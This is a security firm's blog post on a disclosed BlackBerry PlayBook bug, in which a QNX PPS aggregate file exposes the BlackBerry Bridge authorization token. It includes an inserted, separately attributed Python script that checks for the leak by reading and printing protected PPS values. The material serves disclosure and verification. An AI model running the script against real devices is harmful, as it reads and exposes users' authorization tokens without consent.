Intrepidus Group
Insight

“Voight-Kampff’ing The BlackBerry PlayBook” at INFILTRATE 2012

Posted: January 16, 2012 – 11:43 am | Filed under: bugs, Conferences, Mobile Security

Last week, we gave a talk at Immunity’s excellent INFILTRATE conference in Miami Beach, FL. Our presentation, “Voight-Kampff’ing The BlackBerry PlayBook”, covered some of the black-box, independent research we have performed on the BlackBerry PlayBook. Although some of the content overlapped with our PlayBook talk at SecTor 2011, there were some notable additions. In particular, we discussed reverse engineering of PlayBook firmware images; flaws in the authorization of AppWorld downloads; and the exposure of an authorization token used by BlackBerry Bridge (the PlayBook’s PIM and email sync component).

The last of these has stirred up a fair amount of press since INFILTRATE, so we’d like to clarify a few things:

1. The exposure of the authorization token is made possible by a bug in the Persistent Publish/Subscribe (PPS) facility of the QNX operating system. The bug causes the contents of otherwise-inaccessible PPS objects (files that the reading process has no permission to open) to be readable through a special file in the same directory. RIM was made aware of this PPS bug as a result of our SecTor talk and through notifications from others, and again by us before INFILTRATE, with specific emphasis on the disclosure of the Bridge token. They have fixed this PPS bug in Tablet OS 2.0 (beta).

2. This token exposure effectively renders the BlackBerry handset password moot. The exposed authorization token is accessible once the user has “unlocked” BlackBerry Bridge (where “unlocking” means entering the paired BlackBerry handset’s password, if one is set). Unlocking Bridge is the expected, normal workflow for Bridge users: if you use Bridge on your device at all, you will do this. In the case where no handset password has been set, a malicious actor could simply request the token from the Bridge service directly.

3. This isn’t “sniffing”. Some badly misinformed comments on news articles have suggested things like “a bad guy would have to be within 10 meters to exploit this.” This issue is not, I repeat not, related to Bluetooth (the transport BlackBerry Bridge uses). The token is read from the PlayBook’s own file system by code running on the tablet, so physical proximity has nothing to do with it. As an aside, despite the title of the article, threatpost has one of the best press write-ups so far.

4. The pervasiveness of malicious mobile applications exacerbates this flaw. Unless you’ve been living under a rock, you know that even “savvy” users are frequently duped by seemingly legitimate applications which later turn out to be doing Bad Things. Downplaying this attack vector is nonsense, and the “if dumb users install malicious apps, they deserve whatever’s coming to them” argument is silly. Note, too, that a client-side vulnerability in the browser or a document reader could remove the need for the user to install anything at all, since code running on the tablet by any means can read the token the same way.
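The check a practitioner would want for point 1 above is a quick way to tell whether a PPS directory on a given Tablet OS build still exposes unreadable objects through the aggregate file, for instance to confirm the fix in the 2.0 beta. The script below is an added example written for this post, not code from Intrepidus Group or RIM. It assumes, from QNX’s PPS documentation rather than from the post itself, that the aggregate object is named `.all` and that PPS objects use the `@name` / `attribute:encoding:value` text format; the object and attribute names in the embedded sample are constructed for illustration and are not the PlayBook’s real Bridge layout. Run it as the unprivileged user a third-party app would execute as, pointing it at a PPS directory; with no arguments it runs against the constructed sample.

```python
import errno
import os
import sys

# Name of PPS's per-directory aggregate object. Taken from QNX's PPS
# documentation, not from the post (which only says "a special file in the
# same directory"); treat it as an assumption when pointing this at a device.
ALL_OBJECT = ".all"


def parse_pps(text):
    """Parse PPS object text into {object: {attribute: (encoding, value)}}.

    PPS objects are line oriented: an '@name' line starts an object and each
    following 'attribute:encoding:value' line sets one attribute (encodings
    such as 's' for string, 'n' for number, 'b' for boolean). Lines that do
    not fit that shape (e.g. delta-mode deletions) are ignored here.
    """
    objects = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("@"):
            current = line[1:]
            objects.setdefault(current, {})
            continue
        if current is None:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        attr, encoding, value = parts
        objects[current][attr] = (encoding, value)
    return objects


def read_object(path):
    """Read an object without hanging: PPS reads may wait for updates after
    the initial contents, so open non-blocking and stop on EOF or EAGAIN."""
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
    chunks = []
    try:
        while True:
            try:
                data = os.read(fd, 65536)
            except OSError as exc:
                if exc.errno in (errno.EAGAIN, errno.EWOULDBLOCK):
                    break
                raise
            if not data:
                break
            chunks.append(data)
    finally:
        os.close(fd)
    return b"".join(chunks).decode("utf-8", "replace")


def unreadable_objects(pps_dir):
    """Names of regular object files in pps_dir that the caller cannot open."""
    denied = set()
    for name in os.listdir(pps_dir):
        if name.startswith("."):
            continue  # .all, .notify and friends are PPS special objects
        path = os.path.join(pps_dir, name)
        if not os.path.isfile(path):
            continue
        try:
            with open(path, "rb"):
                pass
        except OSError as exc:
            if exc.errno in (errno.EACCES, errno.EPERM):
                denied.add(name)
    return denied


def leaked_via_all(all_text, denied):
    """Attributes of objects we could not open that still appear in '.all'.

    A non-empty result means the aggregate object bypasses the per-object
    permissions, which is the behaviour the post describes.
    """
    objects = parse_pps(all_text)
    return {name: objects[name] for name in denied
            if name in objects and objects[name]}


def check_directory(pps_dir):
    """Run the check against a real PPS directory (e.g. a path under /pps)."""
    all_text = read_object(os.path.join(pps_dir, ALL_OBJECT))
    return leaked_via_all(all_text, unreadable_objects(pps_dir))


# Constructed sample of what a vulnerable '.all' could return. The object
# and attribute names are illustrative, not the PlayBook's real layout.
SAMPLE_ALL = """@status
connected:b:true
@bridge_auth
token:s:0123456789abcdef
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        leaks = check_directory(sys.argv[1])
    else:
        # Offline demo: pretend 'bridge_auth' was unreadable to us.
        leaks = leaked_via_all(SAMPLE_ALL, {"bridge_auth"})
    for obj, attrs in sorted(leaks.items()):
        for attr, (enc, value) in sorted(attrs.items()):
            print("LEAK %s/%s (%s) = %s" % (obj, attr, enc, value))
    sys.exit(1 if leaks else 0)
```

The script exits non-zero when any attribute of an object it could not open turns up in the aggregate file. A clean result on one directory says nothing about the others, so on a real device it should be run over every PPS directory the app’s user can list.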

In upcoming posts, we’ll dive deeper into the meat of our research, so stay tuned. For those interested, we have posted the slides on SlideShare and uploaded some initial code to the Intrepidus Group GitHub page.


5 Trackbacks

  1. By BlackBerry PlayBook Lets Hackers View Your Email on January 18, 2012 at 6:09 am

    [...] Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]

  4. [...] it hits RIM on its biggest strength compared to other devices: security. Zach Lanier and Ben Nell of Intrepidus Group were the ones who found the Bridge’s weak spot. They included it in their Blade Runner-themed [...]
